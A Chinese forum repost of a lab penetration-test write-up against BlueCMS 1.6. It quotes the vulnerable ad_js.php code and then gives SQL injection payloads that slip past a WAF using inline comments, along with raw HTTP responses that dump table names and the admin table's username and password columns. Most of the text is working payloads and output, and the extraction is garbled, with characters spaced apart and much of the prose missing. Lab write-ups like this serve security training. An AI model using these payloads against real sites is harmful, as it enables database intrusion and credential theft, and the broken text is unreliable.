搜索

[18603] 2021-07-29_实战|记一次内网靶机渗透测试

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-29_实战|记一次内网靶机渗透测试   1 1 c c a a b   H A C K   2 0 2 1 - 0 7 - 2 9 #   , 1 2 #   , 2 0 #   , 2 #   , 1 - 6 b l u e c m s ; W e b 1 9 2 . 1 6 8 . 1 4 0 . 1 3 1 / 1 9 2 . 1 6 8 . 1 1 1 . 1 2 8 W e b 1 9 2 . 1 6 8 . 1 1 1 . 8 0 / 1 0 . 1 0 . 1 0 . 8 0 D C 1 0 . 1 0 . 1 0 . 1 0 0 x 0 1   w e b w e b 8 0 访
b l u e c m s   1 . 6 c m s 1 . 1   $ _ G E T a d _ j s . p h p
a d _ i d E r r o r g e t o n e g e t o n e s q l $ a d _ i d   =   ! e m p t y ( $ _ G E T [ ' a d _ i d ' ] )   ?   t r i m ( $ _ G E T [ ' a d _ i d ' ] )   :   ' ' ; i f ( e m p t y ( $ a d _ i d ) ) {         e c h o   ' E r r o r ! ' ;         e x i t ( ) ; } $ a d   =   $ d b - > g e t o n e ( " S E L E C T   *   F R O M   " . t a b l e ( ' a d ' ) . "   W H E R E   a d _ i d   = " . $ a d _ i d ) ; i f ( $ a d [ ' t i m e _ s e t ' ]   = =   0 ) {         $ a d _ c o n t e n t   =   $ a d [ ' c o n t e n t ' ] ; } e l s e {         i f ( $ a d [ ' e n d _ t i m e ' ]   <   t i m e ( ) )         {                 $ a d _ c o n t e n t   =   $ a d [ ' e x p _ c o n t e n t ' ] ;         }         e l s e         {                 $ a d _ c o n t e n t   =   $ a d [ ' c o n t e n t ' ] ;         } }         f u n c t i o n   g e t o n e ( $ s q l ,   $ t y p e = M Y S Q L _ A S S O C ) {                 $ q u e r y   =   $ t h i s - > q u e r y ( $ s q l , $ t h i s - > l i n k i d ) ;                 $ r o w   =   m y s q l _ f e t c h _ a r r a y ( $ q u e r y ,   $ t y p e ) ;                 r e t u r n   $ r o w ;         } h t t p : / / 1 9 2 . 1 6 8 . 1 4 0 . 1 3 1 / a d _ j s . p h p ? a d _ i d = 1   a n d   1 = 1
w a f 1 . 2   w a f

f u z z / " % ! *     o r d e r   b y a d _ j s . p h p ? a d _ i d = 1 / % / / o r d e r / / / / b y / / / / 8 a d _ j s . p h p ? a d _ i d = 1 / % / / o r d e r / / / / b y / / / / 7 u n i o n   s e l e c t h t t p : / / 1 9 2 . 1 6 8 . 1 4 0 . 1 3 1 / a d _ j s . p h p ? a d _ i d = 1 / * % % 2 f * / o r d e r / * % 2 f % 2 f * / b y / * % 2 f % 2 f * / 8 < ! - - d o c u m e n t . w r i t e ( " " ) ; - - > a d _ j s . p h p ? a d _ i d = - 1 / * % / * / u n i o n / * / / * / s e l e c t / * / / * / 1 , 2 , 3 , 4 , 5 , 6 , 7
/ ! 5 0 0 0 1 /
/ a d _ j s . p h p ? a d _ i d = - 1 / * % / * / u n i o n / * / / * / / * ! 5 0 4 4 8 s e l e c t * / / * / / * / 1 , 2 , 3 , 4 , 5 , 6 , 7 H T T P / 1 . 1   2 0 0   O K D a t e :   S u n ,   2 5   J u l   2 0 2 1   1 0 : 2 9 : 1 4   G M T S e r v e r :   A p a c h e / 2 . 4 . 1 8   ( W i n 3 2 )   O p e n S S L / 1 . 0 . 2 e   P H P / 5 . 3 . 2 9 S e t - C o o k i e :   B L U E [ u s e r _ i d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ n a m e ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ p w d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y C o n t e n t - L e n g t h :   3 3 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   t e x t / h t m l ; c h a r s e t = g b 2 3 1 2 < ! - - d o c u m e n t . w r i t e ( " 7 " ) ; - - > u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( t a b l e _ n a m e ) ,   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e
d a t a b a s e ( ) f u z z   b y p a s s   p a y l o a d b l u e _ a d m i n / a d _ j s . p h p ? a d _ i d = - 1 / * % / * / u n i o n / * / / * / / * ! 5 0 4 4 8 s e l e c t * / / * / / * / 1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a H T T P / 1 . 1   2 0 0   O K D a t e :   S u n ,   2 5   J u l   2 0 2 1   1 0 : 3 7 : 0 8   G M T S e r v e r :   A p a c h e / 2 . 4 . 1 8   ( W i n 3 2 )   O p e n S S L / 1 . 0 . 2 e   P H P / 5 . 3 . 2 9 S e t - C o o k i e :   B L U E [ u s e r _ i d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ n a m e ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ p w d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y C o n t e n t - L e n g t h :   4 0 1 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   t e x t / h t m l ; c h a r s e t = g b 2 3 1 2 < ! - - d o c u m e n t . w r i t e ( " b l u e _ a d , b l u e _ a d _ p h o n e , b l u e _ a d m i n , b l u e _ a d m i n _ l o g , b l u e _ a n n , b l u e _ a n n _ c a t , b l u e _ a r c _ c a t , b l u e _ a r e a , b l u e _ a r t i c l e , b l u e _ a t t a c h m e n t , b l u e _ b u y _ r e c o r d , b l u e _ c a r d _ o r d e r , b l u e _ c a r d _ t y p e , b l u e _ c a t e g o r y , b l u e _ c o m m e n t , b l u e _ c o n f i g , b l u e _ f l a s h _ i m a g e , b l u e _ g u e s t _ b o o k , b l u e _ i p b a n n e d , b l u e _ l i n k , b l u e _ m o d e l , b l u e _ n a v i g a t e , b l u e _ p a y , b l u e _ p o s t , b l u e _ p o s t _ a t t , b l u e _ p o s t _ p i c , b l u e _ s e r v i c e , b l u e _ t a s k , b l u e _ u s e r " - - >
h e x b y p a s s   p a y l o a d : a d m i n _ n a m e , p w d b l u e _ a d m i n : u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' b l u e _ a d m i n ' / a d _ j s . p h p ? a d _ i d = - 1 / * % / * / u n i o n / * / / * / / * ! 5 0 4 4 8 s e l e c t * / / * / / * / 1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( c o l u m n _ n a m e ) % 2 0 f r o m % 2 0 i n f o r m a t i o n H T T P / 1 . 1   2 0 0   O K D a t e :   S u n ,   2 5   J u l   2 0 2 1   1 1 : 0 3 : 5 2   G M T S e r v e r :   A p a c h e / 2 . 4 . 1 8   ( W i n 3 2 )   O p e n S S L / 1 . 0 . 2 e   P H P / 5 . 3 . 2 9 S e t - C o o k i e :   B L U E [ u s e r _ i d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ n a m e ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y S e t - C o o k i e :   B L U E [ u s e r _ p w d ] = d e l e t e d ;   e x p i r e s = T h u ,   0 1 - J a n - 1 9 7 0   0 0 : 0 0 : 0 1   G M T ;   p a t h = / ;   H t t p O n l y C o n t e n t - L e n g t h :   1 0 8 C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   t e x t / h t m l ; c h a r s e t = g b 2 3 1 2 < ! - - d o c u m e n t . w r i t e ( " a d m i n _ i d , a d m i n _ n a m e , e m a i l , p w d , p u r v i e w , a d d _ t i m e , l a s t _ l o g i n _ t i m e , l a s t _ l o g i n _ i p " ) ; - - >
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理